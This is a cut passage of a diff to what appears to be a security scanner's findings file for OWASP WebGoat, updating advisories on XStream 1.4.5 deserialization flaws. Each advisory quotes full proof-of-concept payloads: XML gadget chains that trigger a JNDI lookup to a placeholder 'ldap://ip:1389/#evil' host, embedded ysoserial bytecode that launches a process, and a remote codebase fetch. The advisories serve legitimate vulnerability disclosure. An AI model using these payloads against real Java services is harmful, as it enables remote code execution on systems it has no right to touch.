<class>javax.naming.InitialContext</class>\r\n                          <name>doLookup</name>\r\n                          <parameter-types>\r\n                            <class>java.lang.String</class>\r\n                          </parameter-types>\r\n                        </method>\r\n                      </val_-setter>\r\n                      <outer-class>\r\n                        <propertySetters>\r\n                          <entry>\r\n                            <string>serialPersistentFields</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>[Ljava.io.ObjectStreamField;</type>\r\n                              <field>\r\n                                <name>serialPersistentFields</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>CASE_INSENSITIVE_ORDER</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>java.util.Comparator</type>\r\n                              <field>\r\n                                <name>CASE_INSENSITIVE_ORDER</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>serialVersionUID</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>long</type>\r\n                              <field>\r\n                                <name>serialVersionUID</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>value</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>["
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <dynamic-proxy>\r\n      <interface>java.lang.Comparable</interface>\r\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\r\n        <owner/>\r\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\r\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\r\n          <stubHandlers>\r\n            <entry>\r\n              <method>\r\n                <class>java.lang.Comparable</class>\r\n                <name>compareTo</name>\r\n                <parameter-types>\r\n                  <class>java.lang.Object</class>\r\n                </parameter-types>\r\n              </method>\r\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\r\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\r\n                  <indices>\r\n                    <int>0</int>\r\n                  </indices>\r\n                  <getters>\r\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\r\n                  </getters>\r\n                  <accessors>\r\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\r\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\r\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\r\n                        <type>int</type>\r\n                        <field>\r\n                          <name>hash</name>\r\n                          <clazz>java.lang.String</clazz>\r\n                        </field>\r\n                      </val_-getter>\r\n                      <val_-isListType>false</val_-isListType>\r\n                      <val_-n>\r\n                        <namespaceURI/>\r\n                        <localPart>hash</localPart>\r\n                        <prefix/>\r\n                      </val_-n>\r\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\r\n                        <type>java.lang.String</type>\r\n                        <method>\r\n                          <class>javax.naming.InitialContext</class>\r\n                          <name>doLookup</name>\r\n                          <parameter-types>\r\n                            <class>java.lang.String</class>\r\n                          </parameter-types>\r\n                        </method>\r\n                      </val_-setter>\r\n                      <outer-class>\r\n                        <propertySetters>\r\n                          <entry>\r\n                            <string>serialPersistentFields</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>[Ljava.io.ObjectStreamField;</type>\r\n                              <field>\r\n                                <name>serialPersistentFields</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>CASE_INSENSITIVE_ORDER</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>java.util.Comparator</type>\r\n                              <field>\r\n                                <name>CASE_INSENSITIVE_ORDER</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>serialVersionUID</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>long</type>\r\n                              <field>\r\n                                <name>serialVersionUID</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>value</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>[C</type>\r\n                              <field>\r\n                                <name>value</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>hash</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>int</type>\r\n                              <field reference='../../../../../val_-getter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                        </propertySetters>\r\n                        <propertyGetters>\r\n                          <entry>\r\n                            <string>serialPersistentFields</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                              <type>[Ljava.io.ObjectStreamField;</type>\r\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>CASE_INSENSITIVE_ORDER</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                              <type>java.util.Comparator</type>\r\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>serialVersionUID</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                              <type>long</type>\r\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>value</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                              <type>[C</type>\r\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>hash</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\r\n                          </entry>\r\n                        </propertyGetters>\r\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\r\n                        <contentClass>java.lang.String</contentClass>\r\n                        <elementDeclaredTypes/>\r\n                      </outer-class>\r\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\r\n                  </accessors>\r\n                  <wrapper>java.lang.Object</wrapper>\r\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\r\n                  <dynamicWrapper>false</dynamicWrapper>\r\n                </bodyBuilder>\r\n                <isOneWay>false</isOneWay>\r\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\r\n            </entry>\r\n          </stubHandlers>\r\n          <clientConfig>false</clientConfig>\r\n        </databinding>\r\n        <methodHandlers>\r\n          <entry>\r\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\r\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\r\n              <owner reference='../../../..'/>\r\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\r\n              <isVoid>false</isVoid>\r\n              <isOneway>false</isOneway>\r\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\r\n          </entry>\r\n        </methodHandlers>\r\n      </handler>\r\n    </dynamic-proxy>\r\n    <string>ldap://ip:1389/#evil</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39141.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39141.yaml)\n- [PoC in GitHub](https://github.com/zwjjustdoit/Xstream-1.4.17)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-434",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-434", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -618,14 +346,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below.  However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<linked-hash-set>\r\n  <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization='custom'>\r\n    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n      <default>\r\n        <__name>Pwnr</__name>\r\n        <__bytecodes>\r\n          <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyNDE2NTkyOTE1MTgwNjAwAQAgTHlzb3NlcmlhbC9Qd25lcjQxNjU5MjkxNTE4MDYwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>\r\n          <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>\r\n        </__bytecodes>\r\n        <__transletIndex>-1</__transletIndex>\r\n        <__indentNumber>0</__indentNumber>\r\n      </default>\r\n    </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n  </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n  <dynamic-proxy>\r\n    <interface>javax.xml.transform.Templates</interface>\r\n    <handler class='sun.reflect.annotation.AnnotationInvocationHandler' serialization='custom'>\r\n      <sun.reflect.annotation.AnnotationInvocationHandler>\r\n        <default>\r\n          <memberValues>\r\n            <entry>\r\n              <string>f5a5a608</string>\r\n              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference='../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'/>\r\n            </entry>\r\n          </memberValues>\r\n          <type>javax.xml.transform.Templates</type>\r\n        </default>\r\n      </sun.reflect.annotation.AnnotationInvocationHandler>\r\n    </handler>\r\n  </dynamic-proxy>\r\n</linked-hash-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.f"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below.  However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<linked-hash-set>\r\n  <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization='custom'>\r\n    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n      <default>\r\n        <__name>Pwnr</__name>\r\n        <__bytecodes>\r\n          <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyNDE2NTkyOTE1MTgwNjAwAQAgTHlzb3NlcmlhbC9Qd25lcjQxNjU5MjkxNTE4MDYwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>\r\n          <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>\r\n        </__bytecodes>\r\n        <__transletIndex>-1</__transletIndex>\r\n        <__indentNumber>0</__indentNumber>\r\n      </default>\r\n    </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n  </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n  <dynamic-proxy>\r\n    <interface>javax.xml.transform.Templates</interface>\r\n    <handler class='sun.reflect.annotation.AnnotationInvocationHandler' serialization='custom'>\r\n      <sun.reflect.annotation.AnnotationInvocationHandler>\r\n        <default>\r\n          <memberValues>\r\n            <entry>\r\n              <string>f5a5a608</string>\r\n              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference='../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'/>\r\n            </entry>\r\n          </memberValues>\r\n          <type>javax.xml.transform.Templates</type>\r\n        </default>\r\n      </sun.reflect.annotation.AnnotationInvocationHandler>\r\n    </handler>\r\n  </dynamic-proxy>\r\n</linked-hash-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39139.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-94",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-94", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -640,14 +364,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<javax.swing.event.EventListenerList serialization='custom'>\r\n  <javax.swing.event.EventListenerList>\r\n    <default>\r\n      <listenerList>\r\n        <javax.swing.undo.UndoManager>\r\n          <hasBeenDone>true</hasBeenDone>\r\n          <alive>true</alive>\r\n          <inProgress>true</inProgress>\r\n          <edits>\r\n            <com.sun.xml.internal.ws.api.message.Packet>\r\n              <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n                <parsedMessage>true</parsedMessage>\r\n                <soapVersion>SOAP_11</soapVersion>\r\n                <bodyParts/>\r\n                <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n                  <attachmentsInitialized>false</attachmentsInitialized>\r\n                  <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\r\n                    <soapPart/>\r\n                    <mm>\r\n                      <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                        <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>\r\n                          <cleaned>false</cleaned>\r\n                          <entries>\r\n                            <com.sun.jndi.ldap.LdapEntry>\r\n                              <DN>cn=four,cn=three,cn=two,cn=one</DN>\r\n                              <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>\r\n                                <javax.naming.directory.BasicAttribute>\r\n                                  <default>\r\n                                    <ignoreCase>false</ignoreCase>\r\n                                  </default>\r\n                                  <int>4</int>\r\n                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                                    <javax.naming.directory.BasicAttribute>\r\n                                      <default>\r\n                                        <ordered>false</ordered>\r\n                                        <attrID>objectClass</attrID>\r\n                                      </default>\r\n                                      <int>1</int>\r\n                                      <string>javanamingreference</string>\r\n                                    </javax.naming.directory.BasicAttribute>\r\n                                    <com.sun.jndi.ldap.LdapAttribute>\r\n                                      <default>\r\n                                        <rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>\r\n                                          <com.sun.jndi.ldap.LdapName>\r\n                                            <string>cn=four,cn=three,cn=two,cn=one</string>\r\n                                            <boolean>false</boolean>\r\n                                          </com.sun.jndi.ldap.LdapName>\r\n                                        </rdn>\r\n                                      </default>\r\n                                    </com.sun.jndi.ldap.LdapAttribute>\r\n                                  </com.sun.jndi.ldap.LdapAttribute>\r\n                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                                    <javax.naming.directory.BasicAttribute>\r\n                                      <default>\r\n                                        <ordered>false</ordered>\r\n                                        <attrID>javaCodeBase</attrID>\r\n                                      </default>\r\n                                      <int>1</int>\r\n                                      <string>http://127.0.0.1:8080/</string>\r\n                                    </javax.naming.directory.BasicAttribute>\r\n                                    <com.sun.jndi.ldap.LdapAttribute>\r\n                                      <default/>\r\n                                    </com.sun.jndi.ldap.LdapAttribute>\r\n                                  